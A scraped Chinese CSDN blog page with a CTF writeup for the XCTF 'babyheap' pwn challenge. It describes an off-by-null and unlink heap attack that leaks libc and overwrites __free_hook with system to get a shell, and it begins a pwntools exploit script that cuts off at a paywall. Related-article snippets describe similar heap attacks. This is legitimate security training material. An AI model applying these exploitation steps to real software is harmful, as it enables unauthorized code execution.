攻防世界 pwn babyheap writeup

最新推荐文章于 2023-06-18 19:18:34 发布
最新推荐文章于 2023-06-18 19:18:34 发布
阅读量502 收藏
点赞数 1
分类专栏: 网络攻防 文章标签: 攻防世界 pwn ctf babyheap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liucc09/article/details/112839310
版权

分析

这题题目中显示是Wellcome To the 2.27 Heap World,而且只能申请7个chunk,理论上应该是一道libc2.27 tcache的题,但因为在交互过程中触发了fastbin的double free错误,所以攻防世界上应该是把这题部署在了libc2.23的环境中,但无所谓,下面libc2.27和libc2.23的解法都会给出。

libc2.27解法

首先我们要泄漏libc的地址,tcache肯定是无法泄漏libc的,因此我们考虑使用unsorted bin来泄漏,这题有off by null,没有UAF。

然后由于create chunk的时候会在输入的内容后面加一个\x00,所以即便chunk在unsorted bin里踩出libc的地址也无法用show方法回显,因为会被\x00截断。

所以唯一的方法就是在create chunk之后想办法把libc地址踩到data里

因此考虑采用unlink攻击构造重叠的chunk。这样就可以得到两个相同的chunk,其中一个在heap_list里,另一个在unsorted_bin里,unsorted_bin里的那个副本会被踩出libc地址,这样show的时候,heap_list中的那个chunk就会打印出libc的地址。

之后就很容易了,修改tcache中chunk的fd指向__free_hook,修改__free_hook为system就好了,然后free被写入了"/bin/sh\x00"的chunk即可。

exp:

from pwn import *
#from LibcSearcher import *
import time

pe = "./timu"
arch = 'amd64'

context.update(arch=arch,os='linux',log_level='DEBUG')
context.terminal = ['tmux', 'splitw', '-h']
DEBUG = False
elf = ELF(pe)
if DEBUG:
    if arch=='amd64':
        libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    else:
        libc = ELF('/lib/i386-linux-gnu/libc.so.6')

    r = process(pe)

else:
    libc = ELF('./libc-2.23.so')
    r = remote('220.249.52.134',43623)
    
se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
ri      = lambda                    :r.interactive()
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(addr=0,PIE=True):
    time.sleep(1)
    if PIE:
        #text_base = int(os.popen("pmap {}| awk '{
   {print
最低0.47元/天 解锁文章
liucc09
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全和pwn技术的竞赛题目。...通过研究这个挑战,我们可以提升在二进制安全和pwn领域的技能,为应对现实世界中的安全威胁做好准备。
攻防世界PWNBabyheap(null off by one)题解
seaaseesa的博客
11-20 2088
Babyheap(null off by one) 本题用到的知识 malloc_hook、realloc_hook、fastbin attack、unsorted bin合并 首先,检查一下程序的保护机制,保护全开 然后用IDA分析,发现在创建并读入数据时,有一个null off by one漏洞 我们所能利用的也就是这个漏洞 第一步仍然是想办法泄露一些关键地址 由于可以溢...
攻防世界 进阶 babyheap
yongbaoii的博客
02-21 422
用到的漏洞是off by null 保护绿油油。 菜单,它这说的是2.27heap,但其实给的libc又是2.23的…… create 最多6个chunk,然后 指针存在heap_list哪个数组里面。 read_input 这个里面可以看到,有个明显的off by null。 delete 删的干干净净。 show 平平无奇打印函数。 off by null的利用方式很多,但是总的来讲就是说先泄露libc的地址,然后再制造fastbin_attack。只是中间方法会有很多种,这取决于chunk的申请、释
记一次bugku awd的pwn
z1r0的博客
03-27 2133
今天闲得没事,随便逛逛的时候看到了bugku awd有战队开了房间,想着没什么事就报名玩了玩,不过pwn题还是很有意思的。 连上去发现是个堆题。。。再一看加固时间20分钟。。。。(瞬间无语住 直接在网上找题,结果发现网上都是2.23下的,这里笔者拿到的是2.27下的(再次瞬间无语住 没办法只好自己写exp了。拿到pwn附件就是一顿瞎分析,结果发现了upadte有堆溢出 再随便翻了翻发现还有一个uaf。 只不过没有show函数而已。 再看了一下保护 脑子里瞬间想好了攻击思路,申请到malloc_hoo
攻防世界(pwn)babyheap(一些常见的堆利用方法)
PLpa的博客
03-22 2012
前言: 此题攻击链路:null_off_by_one修改堆块信息 => UAF泄露libc基址和其他有用信息 => fastbin attack申请堆块到指定地址 => 利用realloc_hook来调整堆栈 => one_gadget get shell。 64位程序,保护全开。 程序提供增删查操作,没有改操作。由于题目已经给了libc-2.23文件(虽然给错了)说明...
babyfengshui [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列23
重新启程
12-26 798
题目地址:babyfengshui 这个题目是高手进阶区的第12题。本题的主要考点是堆溢出,现在ctf主要的考点都已经转移到了堆溢出了,这个题目作为堆溢出的基础题目,还是很容易入门的。 先看看题目 惯例检查一下保护机制: [*] '/ctf/work/python/babyfengshui/babyfengshui' Arch: i386-32-little RE...
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
pwn栈溢出10道练习题有writeup
01-04
在这个场景中,"pwn栈溢出10道练习题有writeup" 提供了10个关于栈溢出的实战练习,每个题目都配有详细的解答,这对于学习和理解栈溢出漏洞原理及其利用技术非常有帮助。 栈溢出是由于程序在栈上分配的内存不足,...
*CTF 2021 PWN babyheap WriteUp
lrcno6的编程世界
01-19 1013
前言 比赛的时候看到这道题就放弃了(哭~~) 主要还是堆学艺不精 (畏难) 赛后认真思考,其实很快就出来了 我们可怜的FPGA: 惨 没办法我们真的太菜了 说实话我觉得赛后能做出来也很给队伍长脸了 *CTF 2021 PWN babyheap WriteUp PWN中的全场最水题(但像我这种菜鸡比赛时都没做出来) 程序分析 全保护 常规堆题的菜单式 一些奇奇怪怪的地方: add功能可以覆盖之前的指针 delete有UAF edit功能居然是从+8偏移开始写的!(这里一开始让我人都傻了)
攻防世界babyheap
weixin_43960998的博客
04-05 194
off by null (libc2.23) 1.程序逆向 程序在 add 的 read 中存在一个 off by null,同时 add 时无 size 限制,可以直接申请进 unsorted bin 的 chunk,个数足够用。可以 show,free 正常 2.漏洞利用 和 secret of my heart 一样的利用手法,不再赘述。 记录一下调试 og 的过程。我们可以先尝试所有 og ,如果没有打通的情况下,利用 realloc 调节栈帧,这里可以断在最后触发时的 malloc 处,然后 s
0ctfbabyheap2017WP——堆溢出fastbin attack初探
GeekCmore的博客
02-18 516
从栈溢出进入堆溢出,漏洞利用的复杂度上了一个大台阶,主要是因为 ptmalloc 内存管理器对于堆管理设计了复杂的数据结构和算法,要想进入堆溢出的学习,就必须厘清它们之间的关系。本文将从一个经典的例子——0ctfbabyheap2017 来介绍一个初级的 fastbin attack 以初探堆溢出攻击。
0ctf2018-babyheap调试记录fastbin-attack,off-by-one
weixin_30596165的博客
11-03 105
查看文件格式以及保护开启情况。发现为64位程序,符号被剥离,动态链接程序且题目提供给了libc。保护全开,猜想可能是fast attack加上malloc_hook利用(毕竟去年这题是这个利用,肯定先往这边想) 简单的运行程序,发现是常规的菜单类题目,功能有申请内存(alloc)、更新(update)、删除(delete)、查看(view)、退出。我们每个功能走...
actf_2019_babyheap题解析
qq_29317353的博客
06-18 272
再次创建一个0x10大小的堆块,会从fastbin里面拿出一个0x10大小的堆块就是index3会覆盖掉index0的地址根据malloc的分配机制,所以把函数的指针改为system把content的指针改成/bin/sh就完成了UAF漏洞利用的一个过程。struct chunk是0x10的堆结构体,content chunk是用来存放数据的。查看printf_out,发现利用点。思路创键3给堆块,大小相同,防止合并。由于是UAF漏洞先看,free。看看分配堆块的地方,看注释。mian函数分析,见注释。
babyheap_fastbin_attack
playmaker的博客
06-23 234
babyheap-堆溢出之fastbin_attack 首先检查程序保护 保护全开。是一个选单系统 分析程序 void new() { int index; // [rsp+0h] [rbp-10h] signed int size; // [rsp+4h] [rbp-Ch] void *ptr; // [rsp+8h] [rbp-8h] for ( index = 0; i...
XCTF 4th-QCTF-2018——Noleak分析
Eagle_hwei的博客
02-14 598
Noleak的题目分析 2020-02-1321:52:33 by hawkJW 题目附件、ida文件及wp链接   这道题考察的比较综合,设置到方方面面的知识点,这里记录一下   1.  程序流程总览 首先,还是老规矩,看一下保护情况   可以看到,RELRO保护全开,则没有办法修改got表了,同时开启了Canary保护,栈溢出可能也有一定困难;但是我们看到,有NX没有开启,...
攻防世界-babyheap解题思路
aptx4869_li的博客
12-19 472
攻防世界-babyheap解题思路 文章目录攻防世界-babyheap解题思路保护机制分析漏洞分析攻击方式整理动态调试观察变化情况利用思路整理整理一下思路解题脚本执行效果 这是一个菜鸟误入大佬圈的开始,这个题初一看babyheap,以为是个简单题,结果是个坑,越陷越深 在此也感谢两位大佬,分享了解题思路,另外两位帮我补充了关键知识点: 关于解题思路:ha1vk,PLpa 关于知识点:如何判断One_gadget失效,关于__malloc_hook与__realloc_hook如何配合 也算是记录一
攻防世界 pwn repeater
最新发布
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值